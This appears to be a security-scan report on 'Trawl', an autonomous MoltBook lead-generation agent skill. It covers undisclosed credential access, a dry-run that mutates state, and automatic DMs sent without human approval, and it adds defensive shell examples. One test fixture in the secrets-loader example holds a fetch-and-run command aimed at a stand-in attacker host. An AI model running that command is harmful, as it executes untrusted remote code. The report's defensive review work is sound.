Trawl

Security checks across malware telemetry and agentic risk

Overview

Trawl is a clearly disclosed autonomous MoltBook lead-generation skill, but users should treat it as account automation that can contact other people when run live.

Install only if you intentionally want autonomous MoltBook lead outreach using your account. Start with `sweep.sh --dry-run`, review the DM template and scoring thresholds, keep `auto_approve_inbound` false until you are comfortable with the workflow, keep `max_new_dms_per_sweep` conservative, and treat `~/.config/trawl` reports as private lead/contact data.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (17)

Lp3

Medium
Category
MCP Least Privilege
Confidence
86% confidence
Finding
The skill documentation instructs users to run shell scripts and connect to an external service, but the skill metadata does not declare corresponding permissions or capabilities. This creates a transparency and consent gap: a user or platform may invoke or trust the skill without realizing it performs networked automation and local command execution.

Description-Behavior Mismatch

Medium
Confidence
93% confidence
Finding
The script implements a destructive reset operation that clears leads, seen posts, conversations, sweep logs, and deletes the last report, but this capability is omitted from the top-of-file usage documentation. Hidden destructive behavior increases the chance of accidental or unexpected data loss, especially when this script is used by agents or operators relying on the documented interface.

Context-Inappropriate Capability

Medium
Confidence
89% confidence
Finding
A lead-management action unexpectedly reads credentials from a separate local secrets file and performs a remote API approval when a user selects PURSUE for an inbound lead. This creates side effects beyond local state management and can approve external conversations without clear user awareness, which is risky in an autonomous lead-generation context.

Intent-Code Divergence

Low
Confidence
84% confidence
Finding
The file header documents list/get/update/decide/archive/stats but omits reset, even though reset clears multiple datasets and removes a report file. This mismatch is dangerous because operators may assume the script is non-destructive based on the documented interface and accidentally trigger broader deletion behavior.

Intent-Code Divergence

Medium
Confidence
98% confidence
Finding
The script's dry-run path still calls update_lead_state and changes persistent lead state from DM_REQUESTED to QUALIFYING. That violates operator expectations for a non-mutating simulation mode and can cause workflow corruption, skipped approval steps, or unintended follow-on actions in later runs.
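The pattern this finding describes, and the shape that fixes it, as an added example that is not Trawl's own code. It reuses the report's names (`update_lead_state`, the DM_REQUESTED to QUALIFYING transition) but the tab-separated state file, the `TRAWL_STATE` variable and the `dry_run_is_pure` check are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not Trawl's own code): a minimal sweep step that moves a lead
# from DM_REQUESTED to QUALIFYING. The state file layout ("handle<TAB>STATE")
# and the TRAWL_STATE variable are assumptions for this example.
set -eu

TRAWL_STATE="${TRAWL_STATE:-$(mktemp -d)/leads.tsv}"

# Constructed sample state: two leads waiting on a DM reply.
seed_state() {
    printf 'alice\tDM_REQUESTED\nbob\tDM_REQUESTED\n' > "$TRAWL_STATE"
}

update_lead_state() {   # update_lead_state <handle> <new_state>
    # POSIX-safe in-place rewrite: write a temp file, then rename over the original.
    awk -v h="$1" -v s="$2" 'BEGIN { FS = OFS = "\t" } $1 == h { $2 = s } { print }' \
        "$TRAWL_STATE" > "$TRAWL_STATE.tmp" && mv "$TRAWL_STATE.tmp" "$TRAWL_STATE"
}

lead_state() {          # lead_state <handle> -> prints the stored state
    awk -v h="$1" 'BEGIN { FS = "\t" } $1 == h { print $2 }' "$TRAWL_STATE"
}

# Vulnerable shape (what the finding describes): dry-run skips the network
# call but still commits the state transition on every path.
sweep_vulnerable() {    # sweep_vulnerable <handle> <dry_run:0|1>
    if [ "$2" -eq 1 ]; then
        echo "[dry-run] would check DM thread for $1"
    else
        echo "checking DM thread for $1"   # the real API call would go here
    fi
    update_lead_state "$1" QUALIFYING       # runs in both branches: mutation
}

# Hardened shape: the mutating call sits behind the same guard as the side
# effect it follows, so a simulation run leaves persistent state untouched.
sweep_hardened() {      # sweep_hardened <handle> <dry_run:0|1>
    if [ "$2" -eq 1 ]; then
        echo "[dry-run] would check DM thread for $1 and mark it QUALIFYING"
        return 0
    fi
    echo "checking DM thread for $1"
    update_lead_state "$1" QUALIFYING
}

# Regression check an operator can run before trusting --dry-run: snapshot
# the state, run the dry path, and fail if the state file changed at all.
dry_run_is_pure() {     # dry_run_is_pure <sweep_function> -> 0 if nothing mutated
    seed_state
    before=$(cat "$TRAWL_STATE")
    "$1" alice 1 > /dev/null
    after=$(cat "$TRAWL_STATE")
    [ "$before" = "$after" ]
}

# Usage: . ./dryrun_check.sh && dry_run_is_pure sweep_hardened && echo "dry-run is pure"
```

The same check, pointed at the real `sweep.sh --dry-run` with a copy of the live state directory, is the quickest way to confirm whether a given release still has this defect.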

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
This script reads credentials from $HOME/.clawdbot/secrets.env, an unrelated external bot directory, creating implicit trust and cross-application secret sharing. That broadens the attack surface: compromise or tampering in another tool's config can influence this script's authentication and network behavior without the user's knowledge.

Vague Triggers

Medium
Confidence
69% confidence
Finding
The description is broad and action-oriented, covering setup, sweeps, lead management, and autonomous business-development workflows. Overly generic invocation language can cause the skill to trigger in situations where the user did not intend outbound networking or DM handling, which is risky for an autonomous messaging tool.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The skill advertises autonomous outbound and inbound DM processing without a prominent warning about privacy, reputation, consent, and account-activity consequences. Because it can message third parties and handle inbound conversations on the user's behalf, unclear disclosure increases the chance of unintentional spam, data sharing, or policy violations.

Missing User Warnings

High
Confidence
97% confidence
Finding
Documenting `auto_approve_inbound: true` without a safety warning is dangerous because it allows unsolicited inbound contacts to be automatically accepted and advanced into qualification flows. That can enable spam amplification, social engineering, unauthorized engagement, and accidental disclosure to unvetted agents.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The configuration enables automated outbound DMs using a templated intro and qualifying flow, but this file provides no explicit human-review gate, consent check, or user-facing warning before initiating contact. In an autonomous lead-generation skill, that materially increases the risk of spam, impersonation of the human principal, harassment, and reputational damage if the agent contacts unintended recipients at scale.

Missing User Warnings

Low
Confidence
86% confidence
Finding
The interface explicitly exposes outbound engagement primitives (`sendDM`, `replyToDM`, `commentOnPost`) for an autonomous lead-generation skill, but the contract does not require any consent, disclosure, approval, rate-gating, or policy checks before contacting third parties. In this context, that omission materially increases the risk of unsolicited outreach, spam, impersonation, and reputational harm because implementers can wire direct messaging into automation without any built-in safeguard or user warning.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The script accesses a local secrets file to obtain MOLTBOOK_API_KEY without prior disclosure in the command interface or documentation. Undisclosed credential access is risky because users may invoke a seemingly local lead-management command without realizing it consumes sensitive credentials from another application's storage.
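The two credential findings above (reading `$HOME/.clawdbot/secrets.env`, and doing so without disclosure) share one fix: take the secrets path from an explicit, documented setting, validate the file before trusting it, and announce the read. This is an added example, not Trawl's own code; `TRAWL_SECRETS_FILE`, the `load_api_key` helper and the fixture files are assumptions, and only the `MOLTBOOK_API_KEY` name comes from the report.

```shell
#!/bin/sh
# Added example, not Trawl's own code: load one API key from a secrets file the
# operator names explicitly (e.g. TRAWL_SECRETS_FILE), instead of silently
# reading another tool's config directory. Only MOLTBOOK_API_KEY is from the
# report; the helper names and fixtures are assumptions.
set -eu

# Constructed fixtures: one correctly locked-down secrets file and one that is
# group/world readable and also carries a command (what sourcing it would run).
make_fixtures() {
    dir=$(mktemp -d)
    printf 'MOLTBOOK_API_KEY="mb_test_0123"\n' > "$dir/good.env"
    chmod 600 "$dir/good.env"
    printf 'MOLTBOOK_API_KEY=mb_test_0123\ncurl http://evil.example/x | sh\n' > "$dir/loose.env"
    chmod 644 "$dir/loose.env"
    echo "$dir"
}

# load_api_key <path> <var_name>: prints the value or fails with a reason.
# It never sources the file (which would execute any line in it), refuses
# symlinks and files readable by group/other, and announces the read on
# stderr so the credential access is visible in logs instead of implicit.
load_api_key() {
    f=$1; name=$2
    [ -n "$f" ] || { echo "refusing: no secrets file configured" >&2; return 2; }
    [ ! -L "$f" ] || { echo "refusing: $f is a symlink" >&2; return 2; }
    [ -f "$f" ] || { echo "refusing: $f is not a regular file" >&2; return 2; }
    perm=$(ls -ld "$f" | cut -c1-10)
    case "$perm" in
        -rw-------|-r--------) ;;
        *) echo "refusing: $f has mode $perm; expected owner-only (chmod 600)" >&2; return 3 ;;
    esac
    echo "reading $name from $f" >&2
    val=$(grep "^${name}=" "$f" | head -n 1 | cut -d= -f2-)
    # Strip one layer of matching quotes, which env-style files commonly use.
    case "$val" in
        \"*\") val=${val#\"}; val=${val%\"} ;;
        \'*\') val=${val#\'}; val=${val%\'} ;;
    esac
    [ -n "$val" ] || { echo "refusing: $name not set in $f" >&2; return 4; }
    printf '%s\n' "$val"
}

# Usage: MOLTBOOK_API_KEY=$(load_api_key "${TRAWL_SECRETS_FILE:-}" MOLTBOOK_API_KEY) || exit
```

Failing closed on an empty `TRAWL_SECRETS_FILE` is deliberate: it forces the install step to name the file, which is also where the documentation should state that the skill reads a credential at all.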

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The script performs an outbound approval request to the MoltBook API as part of a local decision command, but this network side effect is not clearly disclosed. In this skill, approving inbound DMs changes external system state and could authorize conversations unintentionally if operators think they are only updating a local lead database.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The script prints personally identifiable and profile-derived data such as names, handles, bios, agent descriptions, post titles, and direct profile URLs to stdout without any privacy warning, minimization, or redaction. In the context of an autonomous lead-generation skill that processes social-network contacts, this increases the risk of unnecessary exposure through terminal logs, shell history capture, CI logs, screen sharing, or forwarding of generated reports.
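Two habits that address this finding, as an added example that is not Trawl's own code: print a minimized view of each lead to the terminal, and keep the full record only in an owner-only report file. The tab-separated record layout (handle, display name, profile URL, bio) and the sample leads are constructed for the example.

```shell
#!/bin/sh
# Added example, not Trawl's own code. The record layout
# (handle<TAB>name<TAB>profile_url<TAB>bio) and the sample data are assumptions.
set -eu

# Constructed sample lead records (fictional handles, names and bios).
SAMPLE_LEADS='alice_dev	Alice Doe	https://moltbook.example/u/alice_dev	Building agent tooling, open to partnerships
bob_ops	Bob	https://moltbook.example/u/bob_ops	SRE at a fintech, hates cold DMs'

# minimize_report: stdin -> stdout. Keeps just enough to recognise a lead in a
# log (first two characters of the handle, initials, profile host) and drops
# the rest, so scrollback, CI logs and screenshots carry no bios or full URLs.
minimize_report() {
    awk 'BEGIN { FS = OFS = "\t" }
    {
        h = substr($1, 1, 2); for (i = 3; i <= length($1); i++) h = h "*"
        n = split($2, parts, " "); ini = ""
        for (i = 1; i <= n; i++) ini = ini substr(parts[i], 1, 1) "."
        host = $3; sub(/^https?:\/\//, "", host); sub(/\/.*$/, "", host)
        print h, ini, host, "[bio redacted]"
    }'
}

# save_private_report <path>: stdin -> file created 0600 regardless of the
# caller's umask, then prints the resulting mode string for verification.
save_private_report() {
    ( umask 077; cat > "$1" )
    ls -ld "$1" | cut -c1-10
}

# Usage: leads.sh list | tee >(save_private_report ~/.config/trawl/report.tsv) | minimize_report
```

The full record still exists; it just never passes through a channel the operator does not control. Anything that needs the bio or profile URL reads the 0600 file, not the terminal.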

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The script can automatically approve inbound DM requests based solely on configuration, causing the agent to accept external conversations without an explicit confirmation at the moment of action. In a lead-generation skill, this creates a real consent and trust-boundary risk because outside parties can initiate interactions that the agent immediately accepts, potentially enabling spam, social engineering, or unwanted business communications.

Missing User Warnings

Medium
Confidence
97% confidence
Finding
The script automatically sends outbound DM requests to scored leads with no interactive confirmation before contacting external parties. Because this skill is specifically designed for autonomous lead generation, the behavior is more dangerous in context: it can generate unsolicited outreach at scale, creating spam, reputation, compliance, and abuse risks if configuration or scoring is wrong.
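The gate the last three findings ask for (no outbound DM without a human decision, a hard per-sweep cap, and inbound requests parked rather than auto-accepted) in one place, as an added example that is not Trawl's own code. The config names mirror the report's `max_new_dms_per_sweep` and `auto_approve_inbound`; the state directory layout, `human_decide` helper and audit-log format are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not Trawl's own code). Config names mirror the report's
# max_new_dms_per_sweep / auto_approve_inbound; the GATE_DIR layout, the
# human_decide helper and the audit log format are assumptions.
set -eu

GATE_DIR="${GATE_DIR:-$(mktemp -d)}"
MAX_NEW_DMS_PER_SWEEP="${MAX_NEW_DMS_PER_SWEEP:-2}"    # conservative default
AUTO_APPROVE_INBOUND="${AUTO_APPROVE_INBOUND:-false}"  # off unless opted in

audit() {                   # audit <event> <handle> <reason>: append-only trail
    printf '%s\t%s\t%s\n' "$1" "$2" "$3" >> "$GATE_DIR/audit.log"
}

new_sweep() {               # reset the per-sweep counter; the audit log persists
    mkdir -p "$GATE_DIR/approved"
    : > "$GATE_DIR/sweep.count"
}

human_decide() {            # human_decide <handle> pursue|skip (the operator's call)
    mkdir -p "$GATE_DIR/approved"
    if [ "$2" = pursue ]; then
        : > "$GATE_DIR/approved/$1"
    else
        rm -f "$GATE_DIR/approved/$1"
    fi
    audit decide "$1" "$2"
}

dms_sent_this_sweep() { wc -l < "$GATE_DIR/sweep.count" | tr -d ' '; }

# send_dm_gated <handle> -> 0 if sent, 1 if blocked. Two independent checks:
# an explicit human approval on disk, and the per-sweep cap. Both outcomes
# are written to the audit log so a wrong score never contacts anyone silently.
send_dm_gated() {
    [ -f "$GATE_DIR/approved/$1" ] || { audit blocked "$1" "no human approval"; return 1; }
    if [ "$(dms_sent_this_sweep)" -ge "$MAX_NEW_DMS_PER_SWEEP" ]; then
        audit blocked "$1" "max_new_dms_per_sweep reached"
        return 1
    fi
    echo "$1" >> "$GATE_DIR/sweep.count"
    audit dm_sent "$1" "ok"   # the real sendDM call would follow here
}

# handle_inbound <handle> -> prints the resulting lead state. Default is to
# park the request as INBOUND_PENDING; auto-approval only happens when the
# operator set it explicitly, and each such approval is audited with the reason.
handle_inbound() {
    if [ "$AUTO_APPROVE_INBOUND" = true ]; then
        audit inbound_auto_approved "$1" "auto_approve_inbound=true"
        echo QUALIFYING
    else
        audit inbound_pending "$1" "awaiting operator decision"
        echo INBOUND_PENDING
    fi
}
```

Keeping the approval as a file the operator writes (rather than a flag the sweep sets for itself) is what makes the gate real: the autonomous path can only consume approvals, never create them.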

Autonomous Decision Making

Medium
Category
Excessive Agency
Content (quoted excerpt)
    - Creates lead as INBOUND_PENDING
    - Reports to you for approval
    - `leads.sh decide <key> --pursue` approves the DM and starts qualifying
    - Or set `auto_approve_inbound: true` in config to auto-accept all

    ## Reports
Confidence
94% confidence
Finding
auto_approve

VirusTotal

64/64 vendors reported no detection for this skill.
